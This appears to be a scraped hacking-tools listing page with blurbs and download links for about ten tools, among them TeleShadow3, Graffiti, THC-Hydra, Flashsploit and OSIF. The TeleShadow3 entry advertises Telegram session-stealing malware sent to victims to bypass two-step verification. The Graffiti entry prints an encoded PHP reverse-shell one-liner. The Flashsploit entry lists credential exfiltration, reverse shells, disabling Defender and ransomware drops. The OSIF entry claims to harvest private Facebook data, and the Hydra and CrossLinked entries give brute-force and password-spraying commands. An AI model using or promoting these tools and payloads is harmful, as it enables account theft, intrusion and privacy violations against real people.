image
Teleshadow3- Advanced Telegram Desktop Session Hijacker! Download Click HERE to download the latest version! Stealing desktop telegrams has never been so easy! Set the email and sender details of the sender and recipient or use Telegram API! and send it to the victim after compiling. How do I use the session file? Just put tdata and telegram.exe in the same directory and open telegram.exe What features does it have? Bypass new security mechanisms Bypass Two-step verification! Bypass Inherent identity and need 5-digit verification code! Support SMTP Transport Support Telegram API Transport (With Proxy) Support FakeMessage Support Custom Icons Bypass A.V (Comming soon…) NOTE: Only official telegram desktops currently supported Download TeleShadow3

image
CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or another security testing against an organization. Using similar search engine scraping capabilities found in tools like subscraper and pymeta , CrossLinked will find valid employee names and help format the data according to the organization’s account naming convention. Results will be written to a ‘names.txt’ file in the current directory for further testing. Setup git clone https://github.com/m8r0wn/crosslinked cd crosslinked pip3 install -r requirements.txt Examples python3 crosslinked.py -f ‘{first}.{last}@domain.com’ company_name python3 crosslinked.py -f ‘domain{f}{last}’ -t 45 -j 0.5 company_name Usage -h, –help show this help message and exit -t TIMEOUT Timeout [seconds] for search threads (Default: 25) -j JITTER Jitter for scraping evasion (Default: 0) -o OUTFILE Change name of output file (default: names.txt -f NFORMAT Format names, ex: ‘domain{f}{last}’, ‘{first}.{last}@domain.com’ -s, –safe Only parse names with company in title (Reduces false positives) -v Show names and titles recovered after enumeration Additions Two additional scripts are included in this repo to aid in generating potential username and password files: pwd_gen.py – Generates custom password lists using words and variables defined at the top of the script. Perform number/letter substitutions, append special characters, and more. Once configured, run the script with no arguments to generate a ‘passwords.txt’ output file. user_gen.py – Generates custom usernames using inputs from firstname.txt and lastname.txt files, provided at the command line. Format is defined similiar to crosslinked.py and will be written to ‘users.txt’. python3 user_gen.py -first top100_firstnames.txt -last top100_lastnames.txt -f “domain{f}{last}” Download Crosslinked

image
_ _ NOTE _ : Never upload payloads to online checkers _ Graffiti is a tool to generate obfuscated oneliners to aid in penetration testing situations. Graffiti accepts the following languages for encoding: Python Perl Batch Powershell PHP Bash Graffiti will also accept a language that is not currently on the list and store the oneliner into a database. Features Graffiti comes complete with a database that will insert each encoded payload into it, in order to allow end users to view already created payloads for future use. The payloads can be encoded using the following techniques: Xor Base64 Hex ROT13 Raw Some features of Graffiti include: Terminal drop in access, with the ability to run external commands Ability to create your own payload JSON files Ability to view cached payloads inside of the database Ability to run the database in memory for quick deletion Terminal history and saving of terminal history Auto tab completion inside of terminal Ability to securely wipe the history files and database file Multiple encoding techniques as mentioned above Usage Graffiti comes with a builtin terminal, when you pass no flags to the program it will drop into the terminal. The terminal has history, the ability to run external commands, and it’s own internal commands. In order to get help, you jsut have to type help or ? : ________ _____ _____.__ __ .__ / _____/___________ _/ ____/ ______|/ |_|__| / ___ __ __ \ __\ __| __ | _ | // __ | | | | | || | | | ______ /__| (____ /__| |__| |__||__| |__| / / v(0.1) no arguments have been passed, dropping into terminal type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminal [email protected]:~/graffiti# ? Command Description ——— ————– help/? Show this help external List available external commands cached Display all payloads that are already in the database list/show List all available payloads search Search for a specific payload use Use this payload and encode it using a specified coder info Get information on a specified payload check Check for updates history Display command history exit/quit Exit the terminal and running session encode Encode a provided payload [email protected]:~/graffiti# help Command Description ——— ————– help/? Show this help external List available external commands cached Display all payloads that are already in the database list/show List all available payloads search Search for a specific payload use Use this payload and encode it using a specified coder info Get information on a specified payload check Check for updates history Display command history exit/quit Exit the terminal and running session encode Encode a provided payload Graffiti also comes with command line arguments for when you need a payload encoded quickly: usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD] [–create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS] [-l] [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION …]]] [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC] [-H] [-W] [–memory] [-mC COMMAND [COMMAND …]] optional arguments: -h, –help show this help message and exit -c CODEC, –codec CODEC specify an encoding technique (*default=None) -p PAYLOAD, –payload PAYLOAD pass the path to a payload to use (*default=None) –create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS create a payload file and store it inside of ./etc/payloads (*default=None) -l, –list list all available payloads by path (*default=False) -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION …]], –personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION …]] pass your own personal payload to use for the encoding (*default=None) -lH LISTENING-ADDRESS, –lhost LISTENING-ADDRESS pass a listening address to use for the payload (if needed) (*default=None) -lP LISTENING-PORT, –lport LISTENING-PORT pass a listening port to use for the payload (if needed) (*default=None) -u URL, –url URL pass a URL if needed by your payload (*default=None) -vC, –view-cached view the cached data already present inside of the database -H, –no-history do not store the command history (*default=True) -W, –wipe wipe the database and the history (*default=False) –memory initialize the database into memory instead of a .db file (*default=False) -mC COMMAND [COMMAND …], –more-commands COMMAND [COMMAND …] pass more external commands, this will allow them to be accessed inside of the terminal commands must be in your PATH (*default=None) Encoding a payload is simple as this: [email protected]:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065 Encoded Payload: ————————————————– php -r ‘exec(base64_decode(“JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7”));’ ————————————————– A demo of Graffiti can be found here: Installation On any Linux, Mac, or Windows system, Graffiti should work out of the box without the need to install any external packages. If you would like to install Graffiti as an executable onto your system (you must be running either Linux or Mac for it to work successfully), all you have to do is the following: ./install.sh This will install Graffiti into your system and allow you to run it from anywhere. Bugs and issues If you happen to find a bug or an issue, please create an issue with details here and thank you ahead of time! Download Graffiti

image
This release brings the kernel up to version 4.19.28, fixes numerous bugs, includes many updated packages, and most excitingly, features a new release of Kali Linux NetHunter! Kali NetHunter 2019.2 Release NetHunter now supports over 50 devices running all the latest Android versions, from KitKat through to Pie. 13 new NetHunter images have been released for the latest Android versions of your favorite devices, including: Nexus 6 running Pie Nexus 6P, Oreo OnePlus2, Pie Galaxy Tab S4 LTE & WiFi, Oreo These and many more can be downloaded from the NetHunter page. Tool Upgrades This release largely features various tweaks and bug fixes but there are still many updated tools including seclists , msfpc , and exe2hex . For the complete list of updates, fixes, and additions, please refer to the Kali Bug Tracker Changelog . ARM Updates For the ARM users, be aware that the first boot will take a bit longer than usual, as it requires the reinstallation of a few packages on the hardware. This manifests as the login manager crashing a few times until the packages finish reinstalling and is expected behaviour. Upgrade to Kali Linux 2019.2 If you already have a Kali installation you’re happy with, you can easily upgrade in place as follows. [email protected]:~# apt update && apt -y full-upgrade Ensuring your Installation is Updated To double check your version, first make sure your Kali package repositories are correct. [email protected]:~# cat /etc/apt/sources.list deb http://http.kali.org/kali kali-rolling main non-free contrib Then after running ‘apt -y full-upgrade’, you may require a ‘reboot’ before checking: [email protected]:~# grep VERSION /etc/os-release VERSION=”2019.2″ VERSION_ID=”2019.2″ [email protected]:~# uname -a Linux kali 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux If you come across any bugs in Kali, please open a report on our bug tracker . Download Kali Linux 2019.2

image
Versionscan is a tool for evaluating your currently installed PHP version and checking it against known CVEs and the versions they were fixed in to report back potential issues. PLEASE NOTE: Work is still in progress to adapt the tool to linux distributions that backport security fixes. As of right now, this only reports back for the straight up version reported. Installation Using Composer { “require”: { “psecio/versionscan”: “dev-master” } } The only current dependency is the Symfony console. Usage To run the scan against your current PHP version, use: bin/versionscan The script will check the PHP_VERSION for the current instance and generate the pass/fail results. The output looks similar to: Executing against version: 5.4.24 +——–+—————+——+——————————————————————————————————+ | Status | CVE ID | Risk | Summary | +——–+—————+——+——————————————————————————————————+ | FAIL | CVE-2014-3597 | 6.8 | Multiple buffer overflows in the php_parserr function in ext/standard/dns.c in PHP before 5.4.32 … | | FAIL | CVE-2014-3587 | 4.3 | Integer overflow in the cdf_read_property_info function in cdf.c in file through 5.19, as used in… | Results will be reported back colorized as well to easily show the pass/fail of the check. Parameters There are several parameters that can be given to the tool to configure its scans and results: PHP Version If you’d like to define a PHP version to check other than the one the script finds itself, you can use the php-version parameter: bin/versionscan scan –php-version=4.3.2 Report Only Failures You can also tell the versionscan to only report back the failures and not the passing tests: bin/versionscan scan –fail-only Sorting results You can also sort the results either by the CVE ID or by severity (risk rating), with the sort parameter and either the “cve” or “risk” value: bin/versionscan scan –sort=risk Output formats By default _ versionscan _ will output information directly to the console in a human-readable result. You can also specify other output formats that may be easier to parse programatically (like JSON). Use the –format option to change the output: vendor/bin/versionscan scan –php-version=5.5 –format=json Supported output formats are console , json , xml and html . The HTML output format requires an –output option of the directory to write the file: vendor/bin/versionscan scan –php-version=5.5 –format=html –output=/var/www/output The result will be written to a file named something like versionscan-output-20150808.html Download Versionscan

image
Powerfull Simple XSS Scanner made with python 3.7 Installing Requirements: BeautifulSoup4 pip install bs4 requests pip install requests python 3.7 Commands: git clone https://github.com/menkrep1337/XSSCon cd XSSCon python3 xsscon.py –help Usage Basic usage: python3 xsscon.py -u http://testphp.vulnweb.com Advanced usage see help: python3 xsscon.py –help Roadmap v0.3B: Added custom options ( Such –proxy, –user-agent etc… ) First launched v0.3B Patch: Added support for form method GET Download XSSCon

image
Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. THIS TOOL IS FOR LEGAL PURPOSES ONLY! There are already several login hacker tools available, however, none does either support more than one protocol to attack or support parallelized connects. It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and MacOS. Currently this tool supports the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. However the module engine for new services is very easy so it won’t take a long time until even more services are supported. WHERE TO GET You can always find the newest release/production version of hydra at its project page at https://github.com/vanhauser-thc/thc-hydra/releases If you are interested in the current development state, the public development repository is at Github: svn co https://github.com/vanhauser-thc/thc-hydra or git clone https://github.com/vanhauser-thc/thc-hydra Use the development version at your own risk. It contains new features and new bugs. Things might not work! HOW TO COMPILE To configure, compile and install hydra, just type: ./configure make make install If you want the ssh module, you have to setup libssh (not libssh2!) on your system, get it from http://www.libssh.org , for ssh v1 support you also need to add “-DWITH_SSH1=On” option in the cmake command line. IMPORTANT: If you compile on MacOS then you must do this – do not install libssh via brew! If you use Ubuntu/Debian, this will install supplementary libraries needed for a few optional modules (note that some might not be available on your distribution): apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libmemcached-dev This enables all optional modules and features with the exception of Oracle, SAP R/3, NCP and the apple filing protocol – which you will need to download and install from the vendor’s web sites. For all other Linux derivates and BSD based systems, use the system software installer and look for similarly named libraries like in the command above. In all other cases, you have to download all source libraries and compile them manually. SUPPORTED PLATFORMS All UNIX platforms (Linux, *BSD, Solaris, etc.) MacOS (basically a BSD clone) Windows with Cygwin (both IPv4 and IPv6) Mobile systems based on Linux, MacOS or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq) HOW TO USE If you just enter hydra , you will see a short summary of the important options available. Type ./hydra -h to see all available command line options. Note that NO login/password file is included. Generate them yourself. A default password list is however present, use “dpl4hydra.sh” to generate a list. For Linux users, a GTK GUI is available, try ./xhydra For the command line usage, the syntax is as follows: For attacking one target or a network, you can use the new “://” style: hydra [some command line options] PROTOCOL://TARGET:PORT/MODULE-OPTIONS The old mode can be used for these too, and additionally if you want to specify your targets from a text file, you _ must _ use this one: hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS] Via the command line options you specify which logins to try, which passwords, if SSL should be used, how many parallel tasks to use for attacking, etc. PROTOCOL is the protocol you want to use for attacking, e.g. ftp, smtp, http-get or many others are available TARGET is the target you want to attack MODULE-OPTIONS are optional values which are special per PROTOCOL module FIRST – select your target you have three options on how to specify the target you want to attack: a single target on the command line: just put the IP or DNS address in a network range on the command line: CIDR specification like “192.168.0.0/24” a list of hosts in a text file: one line per entry (see below) SECOND – select your protocol Try to avoid telnet, as it is unreliable to detect a correct or false login attempt. Use a port scanner to see which protocols are enabled on the target. THIRD – check if the module has optional parameters hydra -U PROTOCOL e.g. hydra -U smtp FOURTH – the destination port this is optional! if no port is supplied the default common port for the PROTOCOL is used. If you specify SSL to use (“-S” option), the SSL common port is used by default. If you use “://” notation, you must use “[” “]” brackets if you want to supply IPv6 addresses or CIDR (“192.168.0.0/24”) notations to attack: hydra [some command line options] ftp://[192.168.0.0/24]/ hydra [some command line options] -6 smtps://[2001:db8::1]/NTLM Note that everything hydra does is IPv4 only! If you want to attack IPv6 addresses, you must add the “-6” command line option. All attacks are then IPv6 only! If you want to supply your targets via a text file, you can not use the :// notation but use the old style and just supply the protocol (and module options): hydra [some command line options] -M targets.txt ftp You can supply also the port for each target entry by adding “:” after a target entry in the file, e.g.: foo.bar.com target.com:21 unusual.port.com:2121 default.used.here.com 127.0.0.1 127.0.0.1:2121 Note that if you want to attach IPv6 targets, you must supply the -6 option and _ must _ put IPv6 addresses in brackets in the file(!) like this: foo.bar.com target.com:21 [fe80::1%eth0] [2001::1] [2002::2]:8080 [2a01:24a:133:0:00:123:ff:1a] LOGINS AND PASSWORDS You have many options on how to attack with logins and passwords With -l for login and -p for password you tell hydra that this is the only login and/or password to try. With -L for logins and -P for passwords you supply text files with entries. e.g.: hydra -l admin -p password ftp://localhost/ hydra -L default_logins.txt -p test ftp://localhost/ hydra -l admin -P common_passwords.txt ftp://localhost/ hydra -L logins.txt -P passwords.txt ftp://localhost/ Additionally, you can try passwords based on the login via the “-e” option. The “-e” option has three parameters: s – try the login as password n – try an empty password r – reverse the login and try it as password If you want to, e.g. try “try login as password and “empty password”, you specify “-e sn” on the command line. But there are two more modes for trying passwords than -p/-P: You can use text file which where a login and password pair is separated by a colon, e.g.: admin:password test:test foo:bar This is a common default account style listing, that is also generated by the dpl4hydra.sh default account file generator supplied with hydra. You use such a text file with the -C option – note that in this mode you can not use -l/-L/-p/-P options (-e nsr however you can). Example: hydra -C default_accounts.txt ftp://localhost/ And finally, there is a bruteforce mode with the -x option (which you can not use with -p/-P/-C): -x minimum_length:maximum_length:charset the charset definition is a for lowercase letters, A for uppercase letters, 1 for numbers and for anything else you supply it is their real representation. Examples: -x 1:3:a generate passwords from length 1 to 3 with all lowercase letters -x 2:5:/ generate passwords from length 2 to 5 containing only slashes -x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers Example: hydra -l ftp -x 3:3:a ftp://localhost/ SPECIAL OPTIONS FOR MODULES Via the third command line parameter (TARGET SERVICE OPTIONAL) or the -m command line option, you can pass one option to a module. Many modules use this, a few require it! To see the special option of a module, type: hydra -U e.g. ./hydra -U http-post-form The special options can be passed via the -m parameter, as 3rd command line option or in the service://target/option format. Examples (they are all equal): ./hydra -l test -p test -m PLAIN 127.0.0.1 imap ./hydra -l test -p test 127.0.0.1 imap PLAIN ./hydra -l test -p test imap://127.0.0.1/PLAIN RESTORING AN ABORTED/CRASHED SESSION When hydra is aborted with Control-C, killed or crashes, it leaves a “hydra.restore” file behind which contains all necessary information to restore the session. This session file is written every 5 minutes. NOTE: the hydra.restore file can NOT be copied to a different platform (e.g. from little endian to big endian, or from Solaris to AIX) HOW TO SCAN/CRACK OVER A PROXY The environment variable HYDRA_PROXY_HTTP defines the web proxy (this works just for the http services!). The following syntax is valid: HYDRA_PROXY_HTTP=”http://123.45.67.89:8080/” HYDRA_PROXY_HTTP=”http://login:[email protected]:8080/” HYDRA_PROXY_HTTP=”proxylist.txt” The last example is a text file containing up to 64 proxies (in the same format definition as the other examples). For all other services, use the HYDRA_PROXY variable to scan/crack. It uses the same syntax. eg: HYDRA_PROXY=[connect|socks4|socks5]://[login:[email protected]]proxy_addr:proxy_port for example: HYDRA_PROXY=connect://proxy.anonymizer.com:8000 HYDRA_PROXY=socks4://auth:[email protected]:1080 HYDRA_PROXY=socksproxylist.txt ADDITIONAL HINTS sort your password files by likelihood and use the -u option to find passwords much faster! uniq your dictionary files! this can save you a lot of time 🙂 cat words.txt | sort | uniq > dictionary.txt if you know that the target is using a password policy (allowing users only to choose a password with a minimum length of 6, containing a least one letter and one number, etc. use the tool pw-inspector which comes along with the hydra package to reduce the password list: cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt RESULTS OUTPUT The results are output to stdio along with the other information. Via the -o command line option, the results can also be written to a file. Using -b, the format of the output can be specified. Currently, these are supported: text – plain text format jsonv1 – JSON data using version 1.x of the schema (defined below). json – JSON data using the latest version of the schema, currently there is only version 1. If using JSON output, the results file may not be valid JSON if there are serious errors in booting Hydra. JSON Schema Here is an example of the JSON output. Notes on some of the fields: errormessages – an array of zero or more strings that are normally printed to stderr at the end of the Hydra’s run. The text is very free form. success – indication if Hydra ran correctly without error ( NOT if passwords were detected). This parameter is either the JSON value true or false depending on completion. quantityfound – How many username+password combinations discovered. jsonoutputversion – Version of the schema, 1.00, 1.01, 1.11, 2.00, 2.03, etc. Hydra will make second tuple of the version to always be two digits to make it easier for downstream processors (as opposed to v1.1 vs v1.10). The minor-level versions are additive, so 1.02 will contain more fields than version 1.00 and will be backward compatible. Version 2.x will break something from version 1.x output. Version 1.00 example: { “errormessages”: [ “[ERROR] Error Message of Something”, “[ERROR] Another Message”, “These are very free form” ], “generator”: { “built”: “2019-03-01 14:44:22”, “commandline”: “hydra -b jsonv1 -o results.json … …”, “jsonoutputversion”: “1.00”, “server”: “127.0.0.1”, “service”: “http-post-form”, “software”: “Hydra”, “version”: “v8.5” }, “quantityfound”: 2, “results”: [ { “host”: “127.0.0.1”, “login”: “[email protected]”, “password”: “bill”, “port”: 9999, “service”: “http-post-form” }, { “host”: “127.0.0.1”, “login”: “[email protected]”, “password”: “joe”, “port”: 9999, “service”: “http-post-form” } ], “success”: false } SPEED through the parallelizing feature, this password cracker tool can be very fast, however it depends on the protocol. The fastest are generally POP3 and FTP. Experiment with the task option (-t) to speed things up! The higher – the faster 😉 (but too high – and it disables the service) STATISTICS Run against a SuSE Linux 7.2 on localhost with a “-C FILE” containing 295 entries (294 tries invalid logins, 1 valid). Every test was run three times (only for “1 task” just once), and the average noted down. P A R A L L E L T A S K S SERVICE 1 4 8 16 32 50 64 100 128 ——- ——————————————————————– telnet 23:20 5:58 2:58 1:34 1:05 0:33 0:45* 0:25* 0:55* ftp 45:54 11:51 5:54 3:06 1:25 0:58 0:46 0:29 0:32 pop3 92:10 27:16 13:56 6:42 2:55 1:57 1:24 1:14 0:50 imap 31:05 7:41 3:51 1:58 1:01 0:39 0:32 0:25 0:21 (*) Note: telnet timings can be VERY different for 64 to 128 tasks! e.g. with 128 tasks, running four times resulted in timings between 28 and 97 seconds! The reason for this is unknown… guesses per task (rounded up): 295 74 38 19 10 6 5 3 3 guesses possible per connect (depends on the server software and config): telnet 4 ftp 6 pop3 1 imap 3 Download Thc-Hydra

image
Flashsploit is an Exploitation Framework for Attacks using ATtiny85 HID Devices such as Digispark USB Development Board, flashsploit generates Arduino IDE Compatible (.ino) Scripts based on User Input and then Starts a Listener in Metasploit-Framework if Required by the Script, in Summary : Automatic Script Generation with Automated msfconsole. Features TODO : Add Linux and OSX Scripts Windows Data Exfiltration Extract all WiFi Passwords and Uploads an XML to SFTP Server: Extract Network Configuration Information of Target System and Uploads to SFTP Server: Extract Passwords and Other Critical Information using Mimikatz and Uploads to SFTP Server: Reverse Shells Get Reverse Shell by Abusing Microsoft HTML Apps (mshta): Get Reverse Shell by Abusing Certification Authority Utility (certutil) Get Reverse Shell by Abusing Windows Script Host (csript) Get Reverse Shell by Abusing Windows Installer (msiexec) Get Reverse Shell by Abusing Microsoft Register Server Utility (regsvr32) Miscellaneous Change Wallpaper of Target Machine: Make Windows Unresponsive using a .bat Script (100% CPU and RAM usage) Drop and Execute a File of your Choice, a ransomware maybe? 😉 Disable Windows Defender Service on Target Machine Tested on Kali Linux 2019.2 BlackArch Linux Dependencies Flashsploit Depends upon 4 Packages which are Generally Pre-installed in Major Pentest OS : Metasploit-Framework Python 3 SFTP PHP If you think I should still make an Install Script, Open an issue. Usage git clone https://github.com/thewhiteh4t/flashsploit.git cd flashsploit python3 flashsploit.py Download Flashsploit

image
Just the code of my OSINT bot searching for sensitive data leaks on different paste sites. Search terms: credentials private RSA keys WordPress configuration files MySQL connect strings onion links links to files hosted inside the onion network (PDF, DOC, DOCX, XLS, XLSX) Keep in mind: This bot is not beautiful. The code is not complete so far. Some parts like integrating the credentials in a database are missing in this online repository. If you want to use this code, feel free to do so. Keep in mind you have to customize things to make it run on your system. IMPORTANT The bot can be run in two major modes: API mode Scraping mode (using TOR) Is highly recommend using the API mode. It is the intended method of scraping pastes from Pastebin.com and it is just fair to do so. The only thing you need is a Pastebin.com PRO account and whitelist your public IP on their site. To start the bot in API mode just run the program in the following way: python run.py -0 However, it is not always possible to use this intended method, as you might be in NAT mode and therefore you do not have an IP exclusively (whitelisting your IP is not reasonable here). That is the reason beacuse is implemented a scraping mode where fast TOR cycles in combination with reasonable user agents are used to avoid IP blocking and Cloudflare captchas. To start the bot in scraping mode run it in the following way: python run.py -1 Important note: you need the TOR service installed on your system listening on port 9050. Additionally you need to add the following line to your /etc/tor/torrc file. MaxCircuitDirtiness 30 This sets the maximum cycle time of TOR to 30 seconds. Usage To learn how to use the software you just need to call the run.py script with the -h/–help argument. python run.py -h Output: _________ / _____/ ____ _____ ___ __ ____ ____ ____ ___________ _____ _/ ___\__ \ / // __ / / ____/ __ _ __ / ___ / __ \ / ___/| | / /_/ > ___/| | / /_______ /___ >____ /_/ ___ >___| /___ / ___ >__| / / / / //_____/ / usage: run.py [-h] [-0] [-1] [-2] [-ps] Control software for the different modules of this paste crawler. optional arguments: -h, –help show this help message and exit -0, –pastebinCOMapi Activate Pastebin.com module (using API) -1, –pastebinCOMtor Activate Pastebin.com module (standard scraping using TOR to avoid IP blocking) -2, –pasteORG Activate Paste.org module -ps, –pStatistic Show a simple statistic. So far I only implemented the Pastebin.com module and I am working on Paste.org. I will add more modules and update this script over time. Just start the Pastebin.com module separately… python P_bot.py Pastes are stored in data/raw_pastes until they are more then 48000. When they are more then 48000 they get filtered, ziped and moved to the archive folder. All pastes which contain credentials are stored in data/files_with_passwords Keep in mind that at the moment only combinations like USERNAME:PASSWORD and other simple combinations are detected. However, there is a tool to search for proxy logs containing credentials. You can search for proxy logs (URLs with username and password combinations) by using getProxyLogs.py file python getProxyLogs.py data/raw_pastes If you want to search the raw data for specific strings you can do it using searchRaw.py (really slow). python searchRaw.py SEARCHSTRING To see statistics of the bot just call python status.py The file findSensitiveData.py searches a folder (with pastes) for sensitive data like credit cards, RSA keys or mysqli_connect strings. Keep in mind that this script uses grep and therefore is really slow on a big amount of paste files. If you want to analyze a big amount of pastes I recommend an ELK-Stack. python findSensitiveData.py data/raw_pastes There are two scripts stalk_user.py/stalk_user_wrapper.py which can be used to monitor a specific twitter user. This means every tweet he posts gets saved and every containing URL gets downloaded. To start the stalker just execute the wrapper. python stalk_user_wrapper.py Download Scavenger

image
OSIF is an accurate facebook account information gathering, all sensitive information can be easily gathered even though the target converts all of its privacy to (only me), Sensitive information about residence, date of birth, occupation, phone number and email address. Installation $ pkg update upgrade $ pkg install git python2 $ git clone https://github.com/ciku370/OSIF $ cd OSIF Setup $ pip2 install -r requirements.txt Running $ python2 osif.py Screenshot if you are confused how to use it, please type ‘help’ to display the help menu [Warn] please turn off your VPN before using this program !!! [Tips] do not overuse this program !!! Download OSIF